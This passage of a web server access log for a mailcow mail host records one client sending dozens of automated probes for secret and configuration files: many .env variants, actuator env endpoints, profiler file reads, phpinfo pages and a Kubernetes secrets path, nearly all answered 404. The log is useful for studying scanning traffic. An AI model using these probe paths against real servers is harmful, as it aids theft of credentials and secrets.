118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:55 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/_profiler/latest" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:56 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/manage/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:56 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/manage/configprops" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:56 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/actuator/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:56 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/admin/actuator/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:57 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/v1/actuator/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:57 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/v2/actuator/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:57 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/configprops" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:58 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/config" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:58 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/settings" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:58 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:58 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/stripe" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:59 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/keys" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:59 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/_profiler/open?file=.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:59 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/payment/config" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:59 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/app_dev.php/_profiler" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:59 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/dashboard" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:59 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/app_dev.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:59 +0000] - 301 301 - GET https mail.hanmocnn.co.kr "/admin" [Client 185.177.72.60] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:00 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/_wdt" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:00 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/admin/settings" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:00 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:00 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/settings" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:00 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__debug__/" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:00 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/_ignition/health-check" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:00 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/webpack-dev-server" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:00 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:01 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__webpack_dev_server__/sockjs-node/info" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:01 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/telescope/requests" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:01 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:01 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/horizon/api/stats" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:01 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/info.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:01 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/_profiler" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:01 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/phpinfo.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:02 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/_profiler/latest" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:02 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/test.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:02 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/_profiler/open?file=.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:02 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/i.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:02 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/app_dev.php/_profiler" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:02 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/php_info.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:02 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/app_dev.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:03 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/_wdt" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:03 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/v1/namespaces/default/secrets" [Client 185.177.72.60] [Length 69] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:03 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:03 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/graphql?query={__schema{types{name,fields{name}}}}" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:03 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__debug__/" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:03 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/server-status" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:03 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/webpack-dev-server" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:03 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/server-info" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:04 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__webpack_dev_server__/sockjs-node/info" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:04 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:04 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/info.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:04 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/phpinfo.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:05 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/test.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:08 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/i.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:09 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/php_info.php" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:09 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/v1/namespaces/default/secrets" [Client 185.177.72.60] [Length 69] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:09 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/graphql?query={__schema{types{name,fields{name}}}}" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:09 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/server-status" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:41:10 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/server-info" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:47:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 52.87.77.128] [Length 10704] [Gzip -] [Sent-to 192.168.0.250] "okhttp/5.3.0" "-" -[14/Feb/2026:23:47:16 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/favicon.ico" [Client 52.87.77.128] [Length 107] [Gzip 1.36] [Sent-to 192.168.0.250] "okhttp/5.3.0" "-" -[14/Feb/2026:23:47:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/favicon.png" [Client 52.87.77.128] [Length 17611] [Gzip -] [Sent-to 192.168.0.250] "okhttp/5.3.0" "-" -[14/Feb/2026:23:47:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 52.87.77.128] [Length 10702] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "-" -[14/Feb/2026:23:47:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/img/cow_mailcow.svg" [Client 52.87.77.128] [Length 5247] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:47:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/3c8c8b3a1c6b3ce2aa532d167f918f5d056abec5.css" [Client 52.87.77.128] [Length 52850] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:47:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js" [Client 52.87.77.128] [Length 261956] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:47:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/css/flags/4x3/en.svg" [Client 52.87.77.128] [Length 333] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:47:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/bootstrap-icons.woff2?524846017b983fc8ded9325d94ed40f3" [Client 52.87.77.128] [Length 102536] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:47:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-regular.woff2" [Client 52.87.77.128] [Length 156884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:47:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-700.woff2" [Client 52.87.77.128] [Length 155152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:47:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-italic.woff2" [Client 52.87.77.128] [Length 119256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:47:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-700italic.woff2" [Client 52.87.77.128] [Length 125244] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:47:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 52.87.77.128] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:47:58 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/favicon.ico" [Client 52.87.77.128] [Length 167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:47:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/favicon.png" [Client 52.87.77.128] [Length 17611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:48:20 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 185.177.72.60] [Length 10722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:20 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js" [Client 185.177.72.60] [Length 262106] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:21 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js.map" [Client 185.177.72.60] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/index.html" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/checkout" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:22 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/robots.txt" [Client 185.177.72.60] [Length 26] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/sitemap.xml" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.vite" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/backend/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/laravel/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/payment/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/admin/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.example" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/core/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:26 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:26 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/stripe/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:35 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.production" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:35 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.bak" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.local" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/assets/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/app/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:48:37 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/docker/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] 